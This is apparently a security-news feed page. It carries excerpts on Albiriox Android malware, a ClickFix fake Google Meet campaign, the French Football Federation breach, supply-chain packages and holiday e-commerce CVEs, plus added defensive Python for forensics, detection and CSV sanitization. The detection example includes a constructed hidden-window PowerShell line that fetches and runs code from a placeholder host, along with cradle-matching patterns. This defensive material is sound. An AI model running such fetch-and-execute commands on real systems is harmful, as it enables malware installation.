A sophisticated threat actor has been operating a private Out-of-band Application Security Testing (OAST) service hosted on Google Cloud infrastructure to conduct a large-scale exploit campaign targeting more than 200 CVEs, according to new research from VulnCheck. Private OAST Domain Raises Red Flags Security researchers at VulnCheck identified unusual activity involving callbacks to detectors-testing.com, an unfamiliar […]
A dangerous new Android malware called Albiriox has been discovered by security researchers, posing a serious threat to mobile banking and cryptocurrency users worldwide. The malware operates as a Malware-as-a-Service (MaaS), allowing cybercriminals to rent access to this powerful hacking tool for monthly fees ranging from $650 to $720. The Cleafy Threat Intelligence team first identified Albiriox […]
A sophisticated new Android malware family dubbed “Albiriox” has emerged on the cybercrime landscape, offering advanced remote access capabilities as a Malware-as-a-Service (MaaS).
Identified by researchers at Cleafy, the malware is designed to execute On-Device Fraud (ODF) by granting attackers full control over infected devices, allowing them to bypass security measures and drain financial accounts.
Albiriox first appeared in September 2025 within exclusive underground forums, transitioning from a private beta phase to a public commercial offering by October.
The operation is believed to be managed by Russian-speaking threat actors who have aggressively marketed the tool. The service was launched with a subscription model, charging affiliates approximately $650 per month to access the malware’s comprehensive toolkit.
Unlike simple credential stealers, Albiriox is engineered for real-time interaction. It leverages a VNC (Virtual Network Computing) module that streams the victim’s screen directly to the attacker.
This allows criminals to perform banking fraud manually on the victim’s device, often while the user is unaware, effectively circumventing device fingerprinting and two-factor authentication (2FA) protocols.
Two-Stage Infection Chain
The distribution of Albiriox relies on a deceptive two-stage process designed to evade detection. Early campaigns targeted users in Austria using a fraudulent version of the popular “Penny Market” application. The infection chain typically follows these steps:
Social Engineering: Victims receive SMS messages with shortened links promising discounts or prizes, redirecting them to a fake Google Play Store page.
Dropper Installation: The user downloads a dropper application (e.g., the fake Penny app).
Payload Delivery: Once installed, the dropper requests “Install Unknown Apps” permissions and fetches the actual Albiriox payload from a command-and-control (C2) server.
Recent iterations have evolved to include WhatsApp-based lures, requiring users to enter phone numbers to receive download links, further filtering targets to specific regions like Austria.
Albiriox’s architecture focuses on stealth and control. It utilizes “Golden Crypt,” a third-party crypting service, to render the malware Fully Undetectable (FUD) by static antivirus engines. Once active, it employs Accessibility Services to execute overlay attacks and keylogging.
The malware comes hardcoded with a target list of over 400 applications. This extensive list includes major traditional banking apps, cryptocurrency wallets, and payment processors worldwide, Cleafy added.
The following table outlines the technical profile of the Albiriox operations observed during the analysis.
Albiriox’s rapid development cycle suggests it is positioning itself as a dominant tool for financial fraud. Its ability to combine screen streaming with accessibility manipulation enables threat actors to operate invisibly behind black-screen overlays, making it a critical threat to financial institutions and Android users worldwide.
A new, highly sophisticated malware campaign has been identified targeting remote workers and organizations through a fake Google Meet landing page.
Hosted on the deceptive domain gogl-meet[.]com, this attack leverages the “ClickFix” social engineering technique to bypass traditional browser security controls and deliver a Remote Access Trojan (RAT) directly to the victim’s system.
The attack begins when a user navigates to the fraudulent site, which is visually indistinguishable from the legitimate Google Meet interface. Instead of a video feed, the user is interrupted by a pop-up error message, typically claiming a camera or microphone issue titled “Can’t join the meeting.”
Unlike standard phishing that asks for credentials, this page offers a technical “fix” that requires physical user interaction. The prompt instructs the victim to perform a specific sequence of keystrokes: Press the Windows key + R, then CTRL + V, and finally Enter.
Unbeknownst to the user, clicking the “Join now” or “Fix” button on the page triggers a JavaScript function that copies a malicious PowerShell script to their clipboard.
By following the manual keystroke instructions, the user unwittingly pastes and executes this script via the Windows Run dialog, effectively bypassing browser-based security filters such as Google Safe Browsing and SmartScreen.
Forensic Analysis and Indicators
Recent incident response activities involving gogl-meet[.]com have confirmed that this chain leads to a RAT infection. Forensic analysis of affected systems identified the infection’s root cause through the Master File Table (MFT).
Specifically, the MFT entry for the dropped payload revealed critical origin data in its Alternative Data Stream (ADS), capturing both the ClickFix downloaded file and the referrer URL gogl-meet[.]com.
This forensic artifact is crucial for defenders, as it definitively links the execution of the RAT back to the browser-based social engineering event rather than a typical drive-by download or email attachment.
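As an added example (not part of the original report or of any vendor tooling), the following Python parses the Zone.Identifier alternate data stream that Windows attaches to downloaded files and checks its ReferrerUrl and HostUrl against a watchlist. The stream text below is constructed; only the referrer domain gogl-meet[.]com comes from the article, and the host URL is a placeholder. In practice the stream contents come from an MFT parse or from `Get-Content -Stream Zone.Identifier` on the live file; the function expects that text.

```python
import configparser
from urllib.parse import urlparse

# Windows URL security zone ids as written into the Zone.Identifier stream.
ZONE_NAMES = {
    0: "Local machine",
    1: "Local intranet",
    2: "Trusted sites",
    3: "Internet",
    4: "Restricted sites",
}

# Constructed sample of a Zone.Identifier stream for a downloaded file.
# The referrer is the domain named in the article (kept defanged); the host
# URL is a placeholder, not a real indicator.
SAMPLE_ZONE_IDENTIFIER = """[ZoneTransfer]
ZoneId=3
ReferrerUrl=https://gogl-meet[.]com/
HostUrl=https://dl.example.invalid/payload.exe
"""

# Domains tied to the ClickFix lure by the incident described above.
WATCHLIST = {"gogl-meet.com"}


def refang(url: str) -> str:
    """Undo the common [.] / hxxp defanging so a URL can be parsed."""
    return (url.replace("[.]", ".")
               .replace("hxxps://", "https://")
               .replace("hxxp://", "http://"))


def parse_zone_identifier(text: str) -> dict:
    """Parse the INI-style Zone.Identifier stream into a dictionary."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    if not cp.has_section("ZoneTransfer"):
        raise ValueError("no [ZoneTransfer] section in stream")
    sec = cp["ZoneTransfer"]
    zone_id = int(sec.get("ZoneId", "-1"))
    return {
        "zone_id": zone_id,
        "zone_name": ZONE_NAMES.get(zone_id, "unknown"),
        "referrer_url": sec.get("ReferrerUrl"),
        "host_url": sec.get("HostUrl"),
    }


def watchlist_hits(meta: dict, watchlist: set) -> list:
    """Return the URL fields whose host is (or is under) a watchlisted domain."""
    hits = []
    for field in ("referrer_url", "host_url"):
        url = meta.get(field)
        if not url:
            continue
        host = (urlparse(refang(url)).hostname or "").lower()
        if host in watchlist or any(host.endswith("." + d) for d in watchlist):
            hits.append(field)
    return hits


if __name__ == "__main__":
    meta = parse_zone_identifier(SAMPLE_ZONE_IDENTIFIER)
    print(meta)
    print("watchlist hits:", watchlist_hits(meta, WATCHLIST))
```

A ZoneId of 3 (Internet) together with a referrer hit is what ties the file to the browser session rather than to a mail attachment; a missing referrer is common and should be treated as "unknown", not "clean".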
A distinct characteristic of this wave is the obfuscation used within the PowerShell payload itself. Threat actors have begun padding the malicious script with extensive comments containing trusted visual symbols, such as repeated green check-mark emoji.
When a user pastes the content into the small Windows Run box, these symbols may be the only visible text, visually reassuring the victim that the command is “verified” or safe.
This tactic also serves a technical purpose: it can push the actual malicious code (often an IEX download cradle) out of the immediate visible area of the dialog box, masking the script’s true intent.
While ClickFix (also associated with clusters like ClearFake) gained significant traction throughout 2024, this latest iteration demonstrates a shift toward hyper-targeted branding.
Early campaigns impersonated generic browser updates or Word errors; the shift to Google Meet simulation suggests a pivot toward targeting corporate environments, where video conferencing glitches are a common, trusted friction point.
Security teams are advised to update detection rules to flag PowerShell execution strings originating from the Run dialog that contain unusual Unicode characters or extensive comment blocks, which are tell-tale signs of manual execution.
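As an added example of the detection logic recommended above (written for this page, not taken from any vendor rule set), the Python below scores process-creation events of the shape produced by Sysmon Event ID 1 or Security Event 4688. It looks for the indicators the article names, a Run-dialog launch (parent explorer.exe), a high count of non-ASCII symbols, block-comment padding and an IEX-style download cradle, and flags events that combine several. The three events are constructed; the command line in the second mimics the padded ClickFix pattern with a placeholder host, and the thresholds are tunable assumptions.

```python
import re

# Indicators described in the article (comment padding, download cradle)
# plus a hidden-window switch commonly seen alongside them.
BLOCK_COMMENT_RE = re.compile(r"<#.*?#>", re.S)
CRADLE_RE = re.compile(
    r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring|"
    r"downloadfile|frombase64string)\b",
    re.I,
)
HIDDEN_WINDOW_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)

# Thresholds are assumptions for this example, not values from the article.
MIN_NON_ASCII = 5        # symbols outside ASCII before we call it padding
MIN_COMMENT_RATIO = 0.3  # share of the command line that is block comment
FLAG_THRESHOLD = 3       # number of reasons needed to flag an event

# Constructed events. A Run-dialog launch has explorer.exe as the parent.
# evt-2 reproduces the padded shape with a placeholder host; it is not a
# real payload. evt-3 is a legitimately commented maintenance task.
SAMPLE_EVENTS = [
    {"id": "evt-1", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe Get-Process"},
    {"id": "evt-2", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -c "<# ' + "\u2705 " * 20
                     + 'Verified #> iex (iwr http://dl.example.invalid/m)"'},
    {"id": "evt-3", "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": 'powershell.exe -NoProfile -Command '
                     '"<# nightly cleanup #> Remove-Item C:\\Temp\\* -Recurse"'},
]


def score_command(event: dict) -> dict:
    """Collect the reasons an event looks like a pasted ClickFix command."""
    cmd = event["command_line"]
    reasons = []
    if event.get("parent_image", "").lower().endswith("explorer.exe"):
        reasons.append("interactive launch (parent explorer.exe, e.g. Run dialog)")
    non_ascii = sum(1 for c in cmd if ord(c) > 0x7F)
    if non_ascii >= MIN_NON_ASCII:
        reasons.append(f"{non_ascii} non-ASCII symbols")
    comment_len = sum(len(m) for m in BLOCK_COMMENT_RE.findall(cmd))
    if cmd and comment_len / len(cmd) >= MIN_COMMENT_RATIO:
        reasons.append(f"comment padding ({comment_len}/{len(cmd)} chars)")
    if CRADLE_RE.search(cmd):
        reasons.append("download/execute cradle token")
    if HIDDEN_WINDOW_RE.search(cmd):
        reasons.append("hidden window switch")
    return {
        "id": event["id"],
        "score": len(reasons),
        "flagged": len(reasons) >= FLAG_THRESHOLD,
        "reasons": reasons,
    }


def triage(events: list) -> list:
    return [score_command(e) for e in events]


def flagged_ids(events: list) -> list:
    return [r["id"] for r in triage(events) if r["flagged"]]


if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(result)
```

Requiring several reasons keeps a single commented admin script (evt-3) or an interactive `Get-Process` (evt-1) from alerting, while the padded cradle (evt-2) trips every check. On a real estate, the same scoring can be fed from the RunMRU key or from command-line telemetry, and the thresholds should be tuned against a week of baseline events.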
The French Football Federation (FFF) has confirmed a significant cybersecurity incident resulting in the theft of personal data belonging to members and licensees.
The federation revealed that cybercriminals had infiltrated the centralized administrative software used by football clubs across the country to manage memberships and daily operations.
According to the disclosure, the breach was not the result of a software vulnerability, but rather unauthorized access obtained through a compromised user account.
This compromised credential granted the attackers administrative privileges, allowing them to navigate the system and exfiltrate sensitive databases before the intrusion was halted.
Scope of the Stolen Data
While the FFF has stated that the breach is limited to specific data sets, the information exposed is highly sensitive personally identifiable information (PII). The federation confirmed that the attackers accessed and stole the following details regarding club members:
Full names (First and Last)
Date and place of birth
Gender and Nationality
Postal addresses and Email addresses
Telephone numbers
License numbers
The exposure of this specific data combination creates a “full identity” profile for affected individuals, significantly increasing the risk of identity theft and targeted social engineering attacks.
Upon detecting the unauthorized activity, the FFF security teams took immediate defensive action. The compromised administrator account was disabled to cut off access, and a mandatory password reset was enforced across the entire software platform to prevent attackers from moving laterally.
In compliance with French law and GDPR requirements, the FFF has filed a formal complaint regarding the criminal act. They have also notified the relevant regulatory authorities, specifically the National Cybersecurity Agency of France (ANSSI) and the National Commission on Informatics and Liberty (CNIL).
The federation is currently communicating directly with all individuals whose email addresses were found in the exfiltrated database.
The FFF has issued a strong advisory to all licensees to remain vigilant against phishing attempts. Security experts warn that threat actors often use stolen PII to craft convincing emails or SMS messages that appear to come from official sources—in this case, the FFF or a local club.
Members are advised to treat any communication requesting banking details, passwords, or urging the opening of attachments with extreme suspicion.
The federation emphasized that it is constantly strengthening security measures to cope with the “increasing number and new forms of cyberattacks” targeting the sports sector.
Cybersecurity researchers have discovered vulnerable code in legacy Python packages that could potentially pave the way for a supply chain compromise on the Python Package Index (PyPI) via a domain takeover attack.
Software supply chain security company ReversingLabs said it found the “vulnerability” in bootstrap files provided by a build and deployment automation tool named “zc.buildout.”
“The
The North Korean threat actors behind the Contagious Interview campaign have continued to flood the npm registry with 197 more malicious packages since last month.
According to Socket, these packages have been downloaded over 31,000 times, and are designed to deliver a variant of OtterCookie that brings together the features of BeaverTail and prior versions of OtterCookie.
Some of the
The 2025 holiday season has unleashed an unprecedented wave of cyber threats, with attackers deploying industrialized infrastructure to exploit the global surge in online commerce.
This year’s threat landscape is characterized by a calculated expansion of deceptive digital assets, where criminals leverage automated tools to scale their operations across multiple merchant categories.
The primary vector for these campaigns involves the mass creation of look-alike websites designed to mimic legitimate retailers and capture sensitive consumer data during peak shopping periods.
One of the most significant indicators of this pre-holiday offensive is the registration of over 18,000 holiday-themed domains in the past three months alone.
Targeting high-traffic keywords such as “Christmas,” “Black Friday,” and “Flash Sale,” these domains serve as the backbone for phishing schemes and fraudulent storefronts.
Many of these sites mimic household names with slight URL variations, making them nearly indistinguishable to hurried shoppers.
While a portion of these domains remain inactive to evade early detection, hundreds have already been weaponized to host gift card scams and payment-harvesting pages.
Fortinet security analysts identified this extensive network of malicious infrastructure, noting that the campaign’s scale facilitates effective SEO poisoning.
By artificially inflating the search rankings of these malicious URLs, attackers ensure their fraudulent sites appear alongside legitimate results during peak traffic.
The researchers further highlighted a disturbing rise in credential theft, with over 1.57 million login accounts from major e-commerce sites currently circulating in underground markets.
These “stealer logs” contain browser-stored passwords, cookies, and session tokens, enabling rapid account takeovers that bypass traditional login defenses (Figure 1: Domain Registration Trends).
Technical Exploitation of Platform Vulnerabilities
The sophistication of these attacks is most evident in the targeted exploitation of critical e-commerce vulnerabilities. Attackers are actively leveraging CVE-2025-54236, a critical flaw in Adobe Magento caused by improper input validation.
This vulnerability allows threat actors to execute a remote code execution (RCE) attack, effectively bypassing authentication layers to achieve session takeover.
By injecting malicious payloads into unvalidated input fields, attackers gain administrative access, enabling them to install persistent backdoors or JavaScript-based web skimmers directly onto checkout pages.
| CVE ID / Threat | Platform & Component | Vulnerability Type | Severity (CVSS) | Impact & Exploitation Details | Remediation / Action |
|---|---|---|---|---|---|
| CVE-2025-54236 | Adobe Commerce & Magento Open Source | Improper Input Validation | 9.1 (Critical) | Active Exploitation (SessionReaper): Allows unauthenticated attackers to hijack sessions and achieve Remote Code Execution (RCE). Over 250 stores confirmed compromised. Attackers use this to inject skimmers and steal admin access. | Patch Immediately: Apply Adobe Security Bulletin APSB25-88. Ensure versions are upgraded to 2.4.7-p8, 2.4.6-p13, or 2.4.5-p15. |
| CVE-2025-61882 | Oracle E-Business Suite (Oracle EBS) | Unauthenticated RCE | 9.8 (Critical) | Ransomware Target: A flaw in the BI Publisher Integration allows attackers to execute code remotely without login. Actively used by ransomware groups (e.g., Clop) to steal ERP data and disrupt inventory/order systems. | Update: Apply the Oracle Critical Patch Update (October 2025) immediately. Isolate EBS from public internet access if patching is delayed. |
| CVE-2025-47569 | WordPress WooCommerce (Ultimate Gift Card Plugin) | SQL Injection (SQLi) | 9.3 (Critical) | Database Exfiltration: Unauthenticated attackers can manipulate database queries to dump sensitive customer data (PII) and admin credentials. Darknet markets are currently selling access to breached stores using this flaw. | Update/Patch: Update the WooCommerce Ultimate Gift Card plugin to version > 2.8.10. If unable to update, disable the plugin immediately. |
| CVE-2025-62416 | Bagisto (Laravel-based Platform) | Server-Side Template Injection (SSTI) | Critical (Risk) | RCE via Product Description: Attackers with product-creation access can inject malicious template code into product descriptions. When rendered by the server, this executes arbitrary code, leading to full server takeover. | Update: Upgrade Bagisto to version v2.3.8 or later. Sanitize all product description inputs if using older versions. |
| CVE-2025-62417 | Bagisto | CSV Formula Injection | High | Admin Compromise: Malicious product data (e.g., in a CSV export) can trigger formula execution when an admin opens the file in Excel/Sheets, leading to command execution on the admin’s local machine. | Update: Upgrade Bagisto to v2.3.8. Avoid opening untrusted CSV exports directly in spreadsheet software without sanitization. |
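As an added example of the export-side sanitization the CSV formula injection row calls for (written for this page; it is not Bagisto code and assumes nothing about Bagisto's export format), the Python below neutralizes cells that a spreadsheet would interpret as formulas before they are written to a CSV. A cell whose first non-blank character is `=`, `+`, `-` or `@`, or which starts with a tab or carriage return, is prefixed with a single quote so Excel and Sheets treat it as text; every field is double-quoted. The product rows are constructed, and the "formulas" in them are harmless arithmetic used only to show the transformation.

```python
import csv
import io

# Leading characters that make Excel, LibreOffice or Google Sheets evaluate
# a cell as a formula. Leading whitespace is skipped by the spreadsheet, so
# the check is made on the first non-blank character; a leading tab or CR
# is treated as a trigger as well.
FORMULA_TRIGGERS = ("=", "+", "-", "@")
CONTROL_TRIGGERS = ("\t", "\r")

FIELDS = ["sku", "name", "description", "price"]

# Constructed product rows. SKU-2 and SKU-3 carry text that would evaluate
# as a formula once opened in a spreadsheet; the expressions are harmless.
SAMPLE_PRODUCTS = [
    {"sku": "SKU-1", "name": "Plain mug", "description": "Blue ceramic mug", "price": 7.5},
    {"sku": "SKU-2", "name": "=2+2", "description": "@SUM(1,2) looks harmless", "price": 9.0},
    {"sku": "SKU-3", "name": "Gift card", "description": "  -1 hidden behind spaces", "price": -5},
]


def neutralize_cell(value):
    """Prefix formula-like strings with an apostrophe; pass other values through."""
    if not isinstance(value, str) or not value:
        return value
    first = value.lstrip()[:1]
    if value[0] in CONTROL_TRIGGERS or first in FORMULA_TRIGGERS:
        return "'" + value
    return value


def export_csv(rows: list, fieldnames: list) -> str:
    """Write rows to CSV text with every cell neutralized and quoted."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralize_cell(row.get(k)) for k in fieldnames})
    return buf.getvalue()


def parse_csv(text: str) -> list:
    """Read CSV text back into a list of dicts (used to inspect the output)."""
    return list(csv.DictReader(io.StringIO(text)))


if __name__ == "__main__":
    print(export_csv(SAMPLE_PRODUCTS, FIELDS))
```

Typed numeric values such as the price of `-5` are left untouched, so only user-supplied strings are altered; the apostrophe does change the exported text, so apply this at the boundary where the file is destined for a spreadsheet, not on data exchanged between systems. It also does nothing against template injection in the product description itself, which the SSTI row above addresses separately.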
Additionally, the exploitation of CVE-2025-61882 in Oracle E-Business Suite permits unauthenticated RCE, allowing ransomware groups to paralyze backend inventory systems.
These technical incursions are executed via automated scripts that continuously probe for unpatched systems, transforming a single vulnerability into a gateway for massive data exfiltration.
This systematic exploitation underscores the critical need for merchants to apply patches immediately.
The holiday season has always been a magnet for increased online activity, but 2025 marks a new high-water mark in cybercrime intensity. FortiGuard Labs’ latest research spotlights a dramatic surge in the volume and sophistication of attacks targeting retailers, e-commerce providers, and consumers during key shopping events. Attackers are leveraging automation, AI-powered infrastructure, and sophisticated […]
As IT environments become increasingly distributed and organizations adopt hybrid and remote work at scale, traditional perimeter-based security models and on-premises Privileged Access Management (PAM) solutions no longer suffice. IT administrators, contractors and third-party vendors now require secure access to critical systems from any location and on any device, without compromising